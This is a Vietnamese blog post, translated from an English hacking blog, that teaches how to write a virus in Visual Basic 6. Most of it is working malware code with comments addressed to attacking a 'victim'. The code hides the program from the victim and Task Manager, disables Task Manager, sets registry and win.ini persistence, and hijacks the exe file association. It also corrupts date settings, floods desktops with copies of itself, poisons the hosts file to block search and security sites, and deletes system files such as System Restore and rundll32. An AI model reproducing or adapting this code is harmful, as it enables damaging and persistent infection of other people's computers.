Trao đổi với tôi

http://www.buidao.com

4/15/10

[Virus] Hướng dẫn viết Virus

Đây là bài tớ dịch sang Tiếng Việt từ nguồn :
http://youcanhack.blogspot.com/2008/...ual-basic.html

Bạn muốn viết Virus bằng vb6 ? và bạn đang muốn tìm 1 sự giúp đỡ ? Không đâu xa , chính tại nơi này , để làm Virus bằng vb6
Bật vb6 lên
Đầu tiên , hãy bắt đầu với một số mã cơ bản để giấu Virus/Worm/Trojan trong máy của nạn nhân.

Private Sub Form_Load()
On Error Resume Next 'Lệnh này cho phép chương trình của bạn vẫn tiếp tục chạy dù đang bị lỗi.
me.Hide 'Lệnh này sẽ giấu chương trình của bạn với nạn nhân
App.TaskVisible = False
'Lệnh này sẽ giấu ứng dụng của bạn trong danh sách những file exe đang chạy của task manager
End Sub

Ok , bây giờ mới bắt đầu "trò vui" đây , đây là một Scripts mà tôi thích dùng
hi vọng nó sẽ giúp ích cho bạn , tuy nó đơn giản nhưng nên cơm nên cháo đấy
Disable TaskManager :

Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", vbHide

Bằng hàm shell , bạn có thể dùng bất cứ lệnh nào trong CMD ( command dos) , và nếu bạn thêm ,vbHide bên sau nó ,
CMD sẽ không xuất hiện và victim tưởng không có chuyện gì xảy ra.
Thêm một số lệnh nữa trong VB6 Pro :

Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f", vbHide
' Làm chương trình khởi động cùng Window

Shell "REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f", vbHide
'Lệnh trên sẽ làm cho chương trình chạy khi nạn nhân mở một ứng dụng khác , ví dụ : msnmsngr.exe

Shell "REG add HKLM\Control Panel\International /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide

'Những lệnh trên sẽ làm cho ngày giờ trên máy nạn nhân bị đảo lộn hòan toàn
'Đổi "###Letter/Symbol/Number###" thành dấu "?" thì nạn nhân sẽ thấy thời gian là ????? còn ngày là ??????

FileCopy App.Path & "\" & App.EXEName & ".EXE", "Drive:\Path\Name.exe"
'Mã này tốt , khi bạn copy virus/worm ... của bạn tới 1 nơi khác , nó sẽ tìm windows processes giống như svchost.exe mục đích làm cho nạn nhân khó loại bỏ virus của bạn

Dim intResult As Integer
Randomize
intResult = Int((9542 * Rnd) + 4592)
FileCopy App.Path & "\" & App.EXEName & ".EXE", "c:\Documents and Settings\All Users\Desktop\DimenBlackScript.exe" & intResult & ".exe"
'Ok , hãy vui một chút , đây là code đơn giản nhưng khá khó chịu , thêm 1 timer vào chương trình
'và cho interval = 1 , khi đọan code chạy, tất cả desktop của mọi user sẽ bị đầy tràn những chương trình của bạn

'runs the more Memory it takes up and the more viruses that person has to delete, try adding it to places like
' C:\DOCU~\All Users\Start Menu\Programs\Start up\
'That will cause the victim alot of hassle =P.
Ai dịch giùm câu ở trên với , lần đầu dịch bài

Kill "c:\windows\win.ini"
Kill "c:\windows\system.ini"
Open "c:\WINDOWS\win.ini" For Output As #1
Print #1, "Load = C:\Program Files\Virus1.exe"
Print #1, "run = C:\Program Files\Virus2.exe"
Close #1
Open "c:\WINDOWS\system.ini" For Output As #1
Print #1, "Shell=Explorer.exe C:\WINDOWS\System\Virus3.exe"
Print #1, "Shell=Explorer.exe C:\WINDOWS\System32\Virus4.exe"
Close #1
'Ok , code trên làm chương trình của bạn khởi động cùng window mà không cần Registry hoặc DOS

Open "c:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, "208.65.153.251 208.65.153.251 "
Print #1, "208.65.153.251 www.google.com"
Print #1, "208.65.153.251 www.google.co.uk"
Print #1, "208.65.153.251 www.yahoo.com"
Print #1, "208.65.153.251 www.yahoo.co.uk"
Print #1, "208.65.153.251 www.askjeeves.com"
Print #1, "208.65.153.251 www.altavista.com"
Print #1, "208.65.153.251 www.alltheweb.com"
Print #1, "208.65.153.251 www.msn.com"
Print #1, "208.65.153.251 www.hotmail.com"
Print #1, "208.65.153.251 www.myspace.com"
Print #1, "208.65.153.251 www.plunder.com"
Print #1, "208.65.153.251 www.quicksharing.com"
Print #1, "208.65.153.251 www.myspace.com"
Close #1

'Code trên chỉ làm cho nạn nhân không truy cập được và mấy trang như Google thôi, hoặc lấy thêm thông tin
'hoặc không cho tải những chương trình để chặn con Virus của bạn

Kill "%SystemRoot%\syst" & "em32\dfrg.msc"
Kill "%SystemRoot%\syste" & "m32\wscui.cpl"
Kill "C:\Program Files\Co" & "mmon Files\Microsoft Shared\MSInfo\msinfo32.exe"
Kill "%SystemRoot%\syste" & "m32\restore\rstrui.exe"
Kill "c:\WINDOWS\syste" & "m32\rundll32.exe"
'Ok, cuối cùng hãy loại bỏ bằng System Restore, chạy dll ( bằng cách xóa file này,
'nạn nhân sẽ không thấy các thuộc tính của bất kỳ file nào trên máy

mình không chịu trách nhiệm cho những ai mà dùng những code này để làm những việc bất chính.
Dịch có chỗ nào chưa hay mong các anh chỉ giáo

reflink: http://virusvn.com/forum/showthread.php?p=13797#post13797
Được đăng bởi Lúc